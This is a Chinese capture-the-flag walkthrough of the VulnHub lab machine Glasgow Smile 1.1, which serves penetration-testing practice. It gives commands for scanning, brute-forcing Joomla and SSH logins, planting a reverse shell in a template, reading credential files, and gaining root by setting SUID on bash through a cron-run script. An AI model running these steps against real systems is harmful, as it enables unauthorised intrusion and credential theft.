OSCP难度靶机之Glasgow Smile:1.1

admin 2022年11月21日18:27:25安全文章评论6 views2107字阅读7分1秒阅读模式
虚拟机下载地址:https://www.vulnhub.com/entry/glasgow-smile-11,491/
虚拟机简介:Glasgow Smile应该是 OSCP 机器的一种健身房
目标:4个flag
级别:中级

1、信息收集

1.1通过arp-scan检测主机IP地址

arp-scan 192.168.207.0/24

OSCP难度靶机之Glasgow Smile:1.1

1.2 通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.207.147

查看开放22、80端口

OSCP难度靶机之Glasgow Smile:1.1

2、渗透测试

2.1 WEB渗透

1.站点信息收集

访问站点首页显示一个小丑微笑界面

OSCP难度靶机之Glasgow Smile:1.1

通过dirb进行目录扫描,发现存在joomla目录

dirb http://192.168.207.147

OSCP难度靶机之Glasgow Smile:1.1

访问站点显示CMS为joomla

OSCP难度靶机之Glasgow Smile:1.1

2.测试站点

使用joomscan进行扫描测试,检测版本为3.7.3rc1

joomscan --url http://192.168.207.147/joomla/

OSCP难度靶机之Glasgow Smile:1.1

使用cewl创建密码字典

cewl -m 5 http://192.168.207.147/joomla/ > pass.txt

OSCP难度靶机之Glasgow Smile:1.1

使用burpsuite进行密码爆破,获取到账号为joomla,密码为Gotham

OSCP难度靶机之Glasgow Smile:1.1

3.上传webshell

通过获取到的账号和密码登录成功,选择扩展---模板

OSCP难度靶机之Glasgow Smile:1.1

选择模板并把反弹shell填写到index.php中,并选择保存

OSCP难度靶机之Glasgow Smile:1.1

在扩展中选择模板,设置修改的模板为默认

OSCP难度靶机之Glasgow Smile:1.1

开启NC监听,并访问joomla首页,获取到反弹shell

nc -lnvp 4444

OSCP难度靶机之Glasgow Smile:1.1

2.2 主机渗透

1.查看数据库配置

初始化TTY配置

python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm

OSCP难度靶机之Glasgow Smile:1.1

根据joomla配置文件信息,获取到数据库账号和密码

cd /var/www/html/joomla
cat configuration.php

OSCP难度靶机之Glasgow Smile:1.1

登录数据库,查看数据库账号信息

mysql -u joomla -p
use batjoke;
select * from taskforce;

OSCP难度靶机之Glasgow Smile:1.1

保存密码内容并进行base64解码

for line in $(cat test); do echo $line | base64 -d ; echo "" ; done

OSCP难度靶机之Glasgow Smile:1.1

保存账号和解码后的密码通过hardy进行爆破到SSH账号和密码

hydra ssh://192.168.207.147 -L user.txt -P pass.txt

OSCP难度靶机之Glasgow Smile:1.1

2.第一个FLAG

通过爆破出来的账号和密码成功登录到主机

ssh [email protected]

OSCP难度靶机之Glasgow Smile:1.1

查看user.txt中获取到第一个FLAG

cat user.txt

OSCP难度靶机之Glasgow Smile:1.1

3.第二个FLAG

查看Abnerineedyourhelp文件

cat Abnerineedyourhelp

OSCP难度靶机之Glasgow Smile:1.1

通过CyberChef基于ROT13进行在线解密获取到账号和密码

OSCP难度靶机之Glasgow Smile:1.1

通过base64进行解码获取到密码

echo STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA== | base64 -d

OSCP难度靶机之Glasgow Smile:1.1

使用账号Abner和获取到的密码进行登录,获取到第二个FLAG

su - abner
cat user2.txt

OSCP难度靶机之Glasgow Smile:1.1

4.第三个FLAG

查看用户的历史命令,查看有一个压缩包文件

history

OSCP难度靶机之Glasgow Smile:1.1

查找压缩包文件,并复制到/tmp目录中进行解压

find / -print 2>/dev/null | grep -i ".dear_penguins.zip"

OSCP难度靶机之Glasgow Smile:1.1

cp /var/www/joomla2/administrator/manifests/files/.dear_penguins.zip /tmp
unzip .dear_penguins.zip

解压密码为abner账号的登录密码,I33hope99my0death000makes44more8cents00than0my0life0

OSCP难度靶机之Glasgow Smile:1.1

查看解压后的提示信息,提示账号和密码信息

cat dear_penguins

OSCP难度靶机之Glasgow Smile:1.1

使用账号和密码切换到penguin,在本地目录中获取到第三个FLAG

su - penguin
cd SomeoneWhoHidesBehindAMask
cat user3.txt

OSCP难度靶机之Glasgow Smile:1.1

5.查找可执行脚本

查看本地提示信息,说是正在开发一个以root身份启动的程序,开发完毕后会放在当前目录中

cat PeopleAreStartingToNotice.txt

OSCP难度靶机之Glasgow Smile:1.1

查看本地目录中有一个隐藏文件.trash_old

OSCP难度靶机之Glasgow Smile:1.1

通过pspy64进行监听发现该文件有定时任务

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
chmod 777 pspy64
./pspy64

OSCP难度靶机之Glasgow Smile:1.1

6.获取Root下FLAG

修改文件内容并添加二进制文件suid权限

nano .trash_old

添加如下内容:
chmod u+s /usr/bin/bash

OSCP难度靶机之Glasgow Smile:1.1

等待一会儿后查看已经添加suid权限

ls -lah /usr/bin/bash
bash -p

OSCP难度靶机之Glasgow Smile:1.1

查看FLAG信息

cd /root
cat root.txt

OSCP难度靶机之Glasgow Smile:1.1

原文始发于微信公众号(安全孺子牛):OSCP难度靶机之Glasgow Smile:1.1

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月21日18:27:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  OSCP难度靶机之Glasgow Smile:1.1 http://cn-sec.com/archives/1420344.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: